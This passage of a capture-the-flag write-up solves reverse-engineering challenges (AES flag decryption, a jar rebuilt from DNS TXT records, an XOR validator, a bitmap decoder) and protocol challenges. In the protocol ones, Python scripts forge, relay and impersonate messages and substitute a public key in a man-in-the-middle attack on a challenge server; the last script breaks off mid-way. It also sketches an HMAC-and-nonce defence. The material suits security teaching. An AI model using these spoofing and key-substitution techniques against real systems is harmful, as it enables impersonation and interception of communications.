            if (mazeX > 0 && mazeX < 80 && mazeY > 0 && mazeY < 80 && this.maze[mazeX][mazeY] != 0) {
                this.pacX += this.pacVelocityX;
                this.pacY += this.pacVelocityY;
                if (this.maze[mazeX][mazeY] == 1) {
                    this.maze[mazeX][mazeY] = 2;
                    this.score += 10;
                    if (this.score == 64000) {
                        this.loser = true;
                    }
                }
            }
        }

        this.repaint();
    }

    protected void paintComponent(Graphics g) {
        for(int x = 0; x < 80; ++x) {
            for(int y = 0; y < 80; ++y) {
                if (this.maze[x][y] == 0) {
                    g.setColor(Color.BLUE);
                    g.fillRect(x * 24, y * 24 + 125, 24, 24);
                } else {
                    g.setColor(Color.BLACK);
                    g.fillRect(x * 24, y * 24 + 125, 24, 24);
                    if (this.maze[x][y] == 1) {
                        g.setColor(Color.CYAN);
                        g.fillOval(x * 24 + 6, y * 24 + 125 + 6, 12, 12);
                    }
                }
            }
        }

        g.setColor(Color.YELLOW);
        g.fillArc(this.pacX, this.pacY + 125, 24, 24, 30 + 90 * this.direction, 300);
        g.setColor(Color.WHITE);
        g.fillRect(0, 0, 1920, 100);
        Graphics2D g2 = (Graphics2D)g;
        int fontSize = 50;
        Font f = new Font("Comic Sans MS", 1, fontSize);
        g2.setFont(f);
        g2.setColor(Color.RED);
        g2.drawString("Highscore: 6942069", 20, 100);
        g2.drawString("Your Score: " + this.score, 1320, 100);
        g2.setColor(Color.BLACK);
        g2.drawString("HAC - MAN", 735, 75);
        if (this.loser) {
            g.setColor(Color.RED);
            g.fillRect(480, 480, 980, 980);
            g.setColor(Color.WHITE);
            g.fillRect(490, 490, 960, 960);
            g2.setColor(Color.RED);
            g2.drawString("YOU LOSE!", 520, 580);
            f = new Font("Comic Sans MS", 1, 30);
            g2.setColor(Color.BLACK);
            g2.setFont(f);
            g2.drawString("In order to win, you need to cheat!", 520, 680);
            g2.drawString("The game will now close in 5... good luck!", 520, 780);
            Executors.newSingleThreadScheduledExecutor().schedule(() -> {
                System.exit(0);
            }, 5L, TimeUnit.SECONDS);
        }

        if (this.winner) {
            g.setColor(Color.GREEN);
            g.fillRect(480, 480, 980, 980);
            g.setColor(Color.WHITE);
            g.fillRect(490, 490, 960, 960);
            g2.setColor(Color.RED);
            g2.drawString("YOU WIN!!!", 520, 580);
            f = new Font("Comic Sans MS", 1, 30);
            g2.setColor(Color.BLACK);
            g2.setFont(f);
            this.setName(Integer.toString(this.score));
            this.getComponents()[0].revalidate();
            g2.drawString("Amazing job! Sometimes it's good to cheat..", 520, 680);
            g2.drawString("Or is it? " + ((Component)Arrays.stream(this.getComponents()).filter((w) -> {
                return w.isEnabled();
            }).findFirst().get()).getName(), 520, 780);
        }

        f = new Font("Comic Sans MS", 1, 25);
        g2.setFont(f);
        g2.drawString("Sometimes you need to hack, man!", 660, 100);
    }
}

public class JTextBasket extends JComponent {
        :
        :
    public void revalidate() {
        this.invalidate();
        Container rin = this.getParent();
        rin.getName();
        this.setEnabled(true);
        if (rin.getName() != "javacode") {
            byte[] three = this.hexStringToByteArray(String.valueOf((new BigInteger(rin.getName())).multiply(new BigInteger("10")).add(new BigInteger("1")).pow(4)));
            byte[] key = this.hexStringToByteArray((new StringBuilder((new BigInteger(rin.getName())).multiply(new BigInteger("10")).add(new BigInteger("1")).pow(4).toString())).reverse().toString());
            byte[] decodedInput = Base64.getDecoder().decode("6Ach6HiD0JmCc1L+RwxDRzhW3sC1kS6XydgSuWVFpxVXRU8EjfuMxIMoIzMwK/ii");
            Cipher cipher = null;

            try {
                cipher = Cipher.getInstance("AES/CBC/PKCS5Padding");
            } catch (NoSuchAlgorithmException var13) {
                var13.printStackTrace();
            } catch (NoSuchPaddingException var14) {
                var14.printStackTrace();
            }

            try {
                cipher.init(2, new SecretKeySpec(three, "AES"), new IvParameterSpec(key));
            } catch (InvalidKeyException var11) {
                var11.printStackTrace();
            } catch (InvalidAlgorithmParameterException var12) {
                var12.printStackTrace();
            }

            String decrypted = null;

            try {
                decrypted = new String(cipher.doFinal(decodedInput), "UTF-8");
            } catch (UnsupportedEncodingException var8) {
                var8.printStackTrace();
            } catch (IllegalBlockSizeException var9) {
                var9.printStackTrace();
            } catch (BadPaddingException var10) {
                var10.printStackTrace();
            }

            this.setName(decrypted);
        }
    }
        :
        :
}
When winner becomes true, score is 6942069. From this, the following values are computed.
- three: (score * 10 + 1) ** 4 taken as a decimal string and hex-decoded
- key: (score * 10 + 1) ** 4 taken as a decimal string, reversed, and hex-decoded
The encrypted data is decrypted with three as the key and key as the IV.
#!/usr/bin/env python3
from Crypto.Cipher import AES
from Crypto.Util.Padding import unpad
import base64

n = 6942069
x = pow(n * 10 + 1, 4)
x_str = str(x)
key = bytes.fromhex(x_str)         # "three" in the decompiled code (AES key)
iv = bytes.fromhex(x_str[::-1])    # "key" in the decompiled code (CBC IV)

ct = base64.b64decode('6Ach6HiD0JmCc1L+RwxDRzhW3sC1kS6XydgSuWVFpxVXRU8EjfuMxIMoIzMwK/ii')
cipher = AES.new(key, AES.MODE_CBC, iv)
flag = unpad(cipher.decrypt(ct), 16).decode()
print(flag)
DawgCTF{ch3at3R_ch34t3r_pumk1n_34t3r!}
Data Needs Splitting (Reverse Engineering 200)
$ dig TXT data-needs-splitting.umbccd.net
;; Truncated, retrying in TCP mode.

; <<>> DiG 9.20.15-2-Debian <<>> TXT data-needs-splitting.umbccd.net
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 14202
;; flags: qr rd ra; QUERY: 1, ANSWER: 17, AUTHORITY: 2, ADDITIONAL: 13

;; OPT PSEUDOSECTION:
; EDNS: version: 0, flags:; udp: 1232
;; QUESTION SECTION:
;data-needs-splitting.umbccd.net. IN TXT

;; ANSWER SECTION:
        :
        :
;; Query time: 32 msec
;; SERVER: 192.168.64.2#53(192.168.64.2) (TCP)
;; WHEN: Sun Apr 12 18:38:47 JST 2026
;; MSG SIZE rcvd: 4872
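The TXT records contain data that looks relevant. The first 2 bytes of each record appear to be a sequence number and the rest a base64 string, so I concatenate the records in order and decode the result.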
#!/usr/bin/env python3
from base64 import b64decode

# TXT record values as returned by the DNS query (unordered)
encs = [
    '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'
]

# Concatenate the base64 payloads in sequence-number order (first 2 characters)
b64_exe = ''
for i in range(len(encs)):
    for j in range(len(encs)):
        if int(encs[j][:2]) == i:
            b64_exe += encs[j][2:]
            break

bin_data = b64decode(b64_exe)

with open('chall.jar', 'wb') as f:
    f.write(bin_data)
The result is a jar file, so I decompile it with jadx-gui.
package defpackage;

/* renamed from: Main reason: default package */
/* loaded from: chall.jar:Main.class */
public class Main {
    public static void main(String[] strArr) throws Exception {
        Class<?> load = new Loader().load("/assets/file.dat");
        System.out.println(((Boolean) load.getMethod("validate", new Class[0]).invoke(load.getDeclaredConstructor(new Class[0]).newInstance(new Object[0]), new Object[0])).booleanValue() ? "Correct!" : "Incorrect!");
    }
}

package defpackage;

import java.io.InputStream;

/* renamed from: Loader reason: default package */
/* loaded from: chall.jar:Loader.class */
public class Loader extends ClassLoader {
    public Class<?> load(String str) throws Exception {
        InputStream resourceAsStream = getClass().getResourceAsStream(str);
        try {
            if (resourceAsStream == null) {
                throw new RuntimeException("Missing resource: " + str);
            }
            byte[] readAllBytes = resourceAsStream.readAllBytes();
            Class<?> defineClass = defineClass(null, readAllBytes, 0, readAllBytes.length);
            if (resourceAsStream != null) {
                resourceAsStream.close();
            }
            return defineClass;
        } catch (Throwable th) {
            if (resourceAsStream != null) {
                try {
                    resourceAsStream.close();
                } catch (Throwable th2) {
                    th.addSuppressed(th2);
                }
            }
            throw th;
        }
    }
}

package defpackage;

import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStreamReader;

/* renamed from: Validator reason: default package */
/* loaded from: chall.jar:assets/file.dat */
public class Validator {
    public boolean validate() {
        BufferedReader bufferedReader = new BufferedReader(new InputStreamReader(System.in));
        System.out.println("Enter the flag:");
        try {
            String readLine = bufferedReader.readLine();
            StringBuilder sb = new StringBuilder();
            for (int i = 0; i < readLine.length(); i++) {
                sb.append((readLine.charAt(i) ^ ((char) ((2194307438957234483 >>> ((i % 4) * 16)) & 65535))) ^ ((char) ((148527584754938272 >>> ((i % 4) * 16)) & 65535)));
            }
            if (sb.toString().equals("145511939249997195145441944550467175145531942549987228145401943650017203145451934650207244145651934650127169")) {
                return true;
            }
            return false;
        } catch (IOException e) {
            throw new RuntimeException(e);
        }
    }
}
Each character of the flag string is XORed with specific keys, and the resulting numbers, concatenated as decimal strings, must equal the following.
145511939249997195145441944550467175145531942549987228145401943650017203145451934650207244145651934650127169
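The number of digits each character contributes is unknown, so I brute-force one character at a time and look for the candidate whose encoded value matches the next substring.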
#!/usr/bin/env python3
target = '145511939249997195145441944550467175145531942549987228145401943650017203145451934650207244145651934650127169'
k1 = 2194307438957234483
k2 = 148527584754938272

flag = ''
i = 0
target_index = 0
while len(target) != target_index:
    # 16-bit key words selected by character position, as in Validator.validate()
    key1 = (k1 >> ((i % 4) * 16)) & 65535
    key2 = (k2 >> ((i % 4) * 16)) & 65535
    # Try every printable character and keep the one whose decimal
    # encoding matches the target at the current offset
    for code in range(33, 127):
        val = str(code ^ key1 ^ key2)
        l = len(val)
        if target[target_index:target_index + l] == val:
            flag += chr(code)
            i += 1
            target_index += l
            break

print(flag)
DawgCTF{J@v@_My_B3l0v3d}
Dust to Dust (Reverse Engineering 250)
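The code works roughly as follows.
・Take input.txt 2 rows × 3 characters at a time as a block and process each block as follows.
・Combine the 3 characters from the first row and the 3 characters from the second row into a 6-bit number.
・Add 32 to this number and output the character with that ASCII code.
・For each pair of rows, append "}" at the end of the line.
・Finally, append "~".
I reverse this to restore the contents of input.txt.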
#!/usr/bin/env python3
with open('output.txt', 'r') as f:
    encs = f.read().rstrip('~').split('}')

input = [''] * (len(encs) * 2)
for i in range(len(encs)):
    for c in encs[i]:
        # Each character carries 6 bits: the upper 3 belong to the first row
        # of the pair, the lower 3 to the second row
        b = bin(ord(c) - 32)[2:].zfill(6)
        input[i * 2] += b[:3]
        input[i * 2 + 1] += b[3:]

with open('input.txt', 'w') as f:
    f.write('\n'.join(input))
Let's look at the contents of the restored input.txt.
The flag is drawn in this text of 0s and 1s.
DawgCTF{Th1s_w4s_1nspIr3d_By_UND3RT4L3!}
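To check the inverse against the forward transform, the packing described above can be reimplemented and round-tripped on a small bitmap. This is an added example, not the challenge's code or the writeup's script: the encoder is reconstructed from the description only, it assumes the output contains no line breaks, and the function names and sample bitmap are constructed for illustration.

```python
"""Round-trip check for the 2-row x 3-column bit packing (added example)."""

# Constructed sample bitmap: 4 rows of 6 bits. The first block is all zeros,
# which encodes to a space character (0 + 32).
SAMPLE = ["000111", "000101", "101010", "010101"]


def encode(rows):
    """Pack pairs of '0'/'1' rows into printable characters, 3 columns at a time."""
    if len(rows) % 2 or any(len(r) != len(rows[0]) or len(r) % 3 for r in rows):
        raise ValueError("need an even number of equal-length rows, width divisible by 3")
    out = []
    for top, bottom in zip(rows[0::2], rows[1::2]):
        for j in range(0, len(top), 3):
            # Upper 3 bits come from the first row, lower 3 bits from the second.
            value = int(top[j:j + 3] + bottom[j:j + 3], 2)
            out.append(chr(value + 32))  # 32..95, so '}' and '~' never collide with data
        out.append("}")                  # terminates one pair of rows
    return "".join(out) + "~"            # terminates the whole stream


def decode(text):
    """Invert encode(); rejects characters outside the 6-bit range."""
    # Strip only a trailing newline: a space is valid data (value 0).
    body = text.rstrip("\n")
    if not body.endswith("~"):
        raise ValueError("missing '~' terminator")
    chunks = body[:-1].split("}")
    if chunks[-1] != "":
        raise ValueError("last row pair is not terminated by '}'")
    rows = []
    for chunk in chunks[:-1]:
        top, bottom = [], []
        for ch in chunk:
            value = ord(ch) - 32
            if not 0 <= value < 64:
                raise ValueError(f"character {ch!r} is outside the 6-bit alphabet")
            bits = format(value, "06b")
            top.append(bits[:3])
            bottom.append(bits[3:])
        rows += ["".join(top), "".join(bottom)]
    return rows


def render(rows, ink="0"):
    """Make the bitmap readable: ink bits become '#', everything else '.'."""
    return "\n".join("".join("#" if c == ink else "." for c in row) for row in rows)


if __name__ == "__main__":
    packed = encode(SAMPLE)
    print(repr(packed))
    print(render(decode(packed)))
```

Rendering the decoded rows with two visually distinct glyphs makes a large bitmap far easier to read than raw 0s and 1s.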
Protocol Analysis 1: Can You Hear Me (Protocol Analysis 50)
It is enough to forward the data received from Alice to Bob.
#!/usr/bin/env python3
import requests
import json

start_url = 'https://protocols.live/model/1'
alice_url = 'https://protocols.live/alice'
bob_url = 'https://protocols.live/bob'

headers = {'Content-Type': 'application/json'}

# Start a session and get its connection id
r = requests.post(start_url)
conn_id = json.loads(r.text)['conn_id']

# Ask Alice for her message
content = ''
data = {'conn_id': conn_id, 'content': content}
json_data = json.dumps(data)
r = requests.post(alice_url, data=json_data, headers=headers)
print(r.text)

# Forward Alice's message to Bob unchanged
content = json.loads(r.text)['content']
data = {'conn_id': conn_id, 'content': content}
json_data = json.dumps(data)
r = requests.post(bob_url, data=json_data, headers=headers)
print(r.text)
The output is as follows.
{"content":"t:Hello|n:bob|t:this is|n:alice|t:give me the flag"}
{"content":"t:here it is|t:DawgCTF{PR0T0C0LS_R_3ZPZ}"}
DawgCTF{PR0T0C0LS_R_3ZPZ}
Protocol Analysis 2: Liar (Protocol Analysis 75)
Starting from the data received from Alice, I rewrite "alice" to "charlie" to impersonate Charlie and obtain the flag.
#!/usr/bin/env python3
import requests
import json

start_url = 'https://protocols.live/model/2'
alice_url = 'https://protocols.live/alice'
bob_url = 'https://protocols.live/bob'

headers = {'Content-Type': 'application/json'}

# Start a session and get its connection id
r = requests.post(start_url)
conn_id = json.loads(r.text)['conn_id']

# Ask Alice for her message
content = ''
data = {'conn_id': conn_id, 'content': content}
json_data = json.dumps(data)
r = requests.post(alice_url, data=json_data, headers=headers)
print(r.text)

# Replace the sender name before passing the message on to Bob
content = json.loads(r.text)['content'].replace('alice', 'charlie')
data = {'conn_id': conn_id, 'content': content}
print(data)
json_data = json.dumps(data)
r = requests.post(bob_url, data=json_data, headers=headers)
print(r.text)
The output is as follows.
{"content":"t:Hello|n:bob|t:this is|n:alice|t:give me the flag"}
{'conn_id': 726972395853216348, 'content': 't:Hello|n:bob|t:this is|n:charlie|t:give me the flag'}
{"content":"t:here it is|t:DawgCTF{CH4NG3_0F_PL4N5}"}
DawgCTF{CH4NG3_0F_PL4N5}
Protocol Analysis 3: Missing (Protocol Analysis 100)
Without receiving any data from Alice, I send the predefined message to Bob.
#!/usr/bin/env python3
import requests
import json

start_url = 'https://protocols.live/model/3'
alice_url = 'https://protocols.live/alice'
bob_url = 'https://protocols.live/bob'

headers = {'Content-Type': 'application/json'}

# Start a session and get its connection id
r = requests.post(start_url)
conn_id = json.loads(r.text)['conn_id']

# Send the message Alice would have sent, without contacting Alice
content = 't:Hello|n:bob|t:this is|n:alice|t:give me the flag'
data = {'conn_id': conn_id, 'content': content}
json_data = json.dumps(data)
r = requests.post(bob_url, data=json_data, headers=headers)
print(r.text)
The output is as follows.
{"content":"t:here it is|t:DawgCTF{N0_0N3_3LS3_H0M3}"}
DawgCTF{N0_0N3_3LS3_H0M3}
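Protocol Analysis 1 to 3 all work because Bob accepts any well-formed `t:`/`n:` message, whoever delivers it. The following added example (not part of the original writeup or the challenge's code) sketches a receiver that binds each request to a fresh challenge and a per-sender HMAC; the `c:` and `m:` tags, the key table and all names are assumptions made for illustration.

```python
"""Receiver-side checks for the 't:..|n:..' message format (added example)."""
import hashlib
import hmac
import secrets

# Constructed demo secrets. Assumption: Bob shares one key with each known peer.
PEER_KEYS = {
    "alice": b"constructed-demo-key-for-alice",
    "charlie": b"constructed-demo-key-for-charlie",
}

# Message body as it appears in the outputs above.
BODY = "t:Hello|n:bob|t:this is|n:alice|t:give me the flag"


def parse(content):
    """Split 'tag:value|tag:value' into ordered (tag, value) pairs."""
    fields = []
    for part in content.split("|"):
        tag, sep, value = part.partition(":")
        if not sep:
            raise ValueError(f"malformed field {part!r}")
        fields.append((tag, value))
    return fields


def sender_of(fields):
    """In the page's layout the first n: is the recipient, the second the sender."""
    names = [value for tag, value in fields if tag == "n"]
    if len(names) != 2:
        raise ValueError("expected recipient and sender names")
    return names[1]


def seal(key, body, nonce):
    """Sender side: append Bob's challenge (c:) and a MAC (m:) over body + challenge."""
    signed = f"{body}|c:{nonce}"
    tag = hmac.new(key, signed.encode(), hashlib.sha256).hexdigest()
    return f"{signed}|m:{tag}"


class Bob:
    def __init__(self, peer_keys):
        self.peer_keys = peer_keys
        self.open_nonces = set()

    def challenge(self):
        """Issue a single-use nonce that the next request must include."""
        nonce = secrets.token_hex(16)
        self.open_nonces.add(nonce)
        return nonce

    def receive(self, content):
        signed, sep, tag = content.rpartition("|m:")
        if not sep:
            return "reject: no MAC"                      # fabricated message (case 3)
        try:
            fields = parse(signed)
            sender = sender_of(fields)
        except ValueError as exc:
            return f"reject: {exc}"
        key = self.peer_keys.get(sender)
        if key is None:
            return "reject: unknown sender"
        expected = hmac.new(key, signed.encode(), hashlib.sha256).hexdigest()
        if not hmac.compare_digest(expected.encode(), tag.encode()):
            return "reject: bad MAC"                     # rewritten sender name (case 2)
        last_tag, nonce = fields[-1]
        if last_tag != "c" or nonce not in self.open_nonces:
            return "reject: stale or unknown nonce"      # replay of an old message
        self.open_nonces.discard(nonce)
        return f"accept: {sender}"


if __name__ == "__main__":
    bob = Bob(PEER_KEYS)
    msg = seal(PEER_KEYS["alice"], BODY, bob.challenge())
    print(bob.receive(msg))                                # relayed unchanged
    print(bob.receive(msg))                                # same message again
    print(bob.receive(msg.replace("alice", "charlie")))    # sender rewritten
    print(bob.receive(BODY))                               # no Alice involved
```

A message relayed unchanged within the session is still accepted, which is expected: the MAC and nonce authenticate the sender and freshness, not the path the message took.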
Protocol Analysis 4: Real Security! (Protocol Analysis 150)
Using k (the encryption key) and d (the nonce) received from Alice, together with d (the encrypted flag) received from Bob, I decrypt the flag with the utility.
#!/usr/bin/env python3
import requests
import json

def get_value(data, key):
    # Return the value of the first 'key:value' field in a '|'-separated message
    pairs = data.split('|')
    for pair in pairs:
        k = pair.split(':')[0]
        if k == key:
            return pair.split(':')[1]
    return None

start_url = 'https://protocols.live/model/4'
alice_url = 'https://protocols.live/alice'
bob_url = 'https://protocols.live/bob'
util_url = 'https://protocols.live/util'

headers = {'Content-Type': 'application/json'}

# Start a session and get its connection id
r = requests.post(start_url)
conn_id = json.loads(r.text)['conn_id']

# Alice's message carries the symmetric key (k) and the nonce (d)
content = ''
data = {'conn_id': conn_id, 'content': content}
json_data = json.dumps(data)
r = requests.post(alice_url, data=json_data, headers=headers)
print(r.text)

content = json.loads(r.text)['content']
k = get_value(content, 'k')
d = get_value(content, 'd')

# Forward it to Bob, who answers with the encrypted flag (d)
data = {'conn_id': conn_id, 'content': content}
json_data = json.dumps(data)
r = requests.post(bob_url, data=json_data, headers=headers)
print(r.text)

content = json.loads(r.text)['content']
d2 = get_value(content, 'd')

# Decrypt with the utility endpoint: key, nonce, ciphertext
url = util_url + '/sym_decrypt'
content = f'k:{k}|d:{d}|d:{d2}'
data = {'conn_id': conn_id, 'content': content}
json_data = json.dumps(data)
r = requests.post(url, data=json_data, headers=headers)
print(r.text)
実行結果は以下の通り。
{"content":"t:Hello|n:bob|t:this is|n:alice|t:send me the flag encrypted under this symetric key and nonce|k:36db2d293d6e2c4cf1ad1178321c19ebb7d851cd6f11927d6dbf476f34efea6e|d:4f16fe582f96a422fdb639fd"}
{"content":"t:here it is|d:00be2ffbc8123c9a695b82981456d5fa644e93f6afd6a23e971a675795acc3a6bb5ffe9fd67e24a2943ed389"}
{"content":"t:DawgCTF{N0T_S0_S3CR3T_K3Y}"}
DawgCTF{N0T_S0_S3CR3T_K3Y}
Protocol Analysis 5: Is This Real (Protocol Analysis 150)
Instead of using the public key received from Alice, generate a public/private key pair with the utility and send that public key to Bob. Then use the utility to decrypt the encrypted flag received from Bob with the private key.
```python
#!/usr/bin/env python3
import requests
import json

def get_value(data, key):
    # Return the value of the first "key:value" field in a '|'-separated message
    pairs = data.split('|')
    for pair in pairs:
        k = pair.split(':')[0]
        if k == key:
            return pair.split(':')[1]
    return None

def get_keys(data):
    # The utility replies "t:public|k:<hex>|t:private|k:<hex>"
    pairs = data.split('|')
    for i in range(len(pairs)):
        if pairs[i] == 't:public':
            pubkey = pairs[i + 1][2:]
        elif pairs[i] == 't:private':
            privkey = pairs[i + 1][2:]
    return pubkey, privkey

start_url = 'https://protocols.live/model/5'
alice_url = 'https://protocols.live/alice'
bob_url = 'https://protocols.live/bob'
util_url = 'https://protocols.live/util'
headers = {'Content-Type': 'application/json'}

r = requests.post(start_url)
conn_id = json.loads(r.text)['conn_id']

# Receive Alice's message (her public key is not used)
content = ''
data = {'conn_id': conn_id, 'content': content}
json_data = json.dumps(data)
r = requests.post(alice_url, data=json_data, headers=headers)
print(r.text)

alice_content = json.loads(r.text)['content']

# Generate our own key pair with the utility
url = util_url + '/gen_asym_key_pair'
content = ''
data = {'conn_id': conn_id, 'content': content}
json_data = json.dumps(data)
r = requests.post(url, data=json_data, headers=headers)
print(r.text)

key_content = json.loads(r.text)['content']
pubkey, privkey = get_keys(key_content)

# Send Bob the same message with the generated public key in place of Alice's
content = alice_content.split('|k:')[0] + '|k:' + pubkey
data = {'conn_id': conn_id, 'content': content}
json_data = json.dumps(data)
r = requests.post(bob_url, data=json_data, headers=headers)
print(r.text)

content = json.loads(r.text)['content']
d = get_value(content, 'd')

# Decrypt Bob's reply with the generated private key
url = util_url + '/asym_decrypt'
content = f'k:{privkey}|d:{d}'
data = {'conn_id': conn_id, 'content': content}
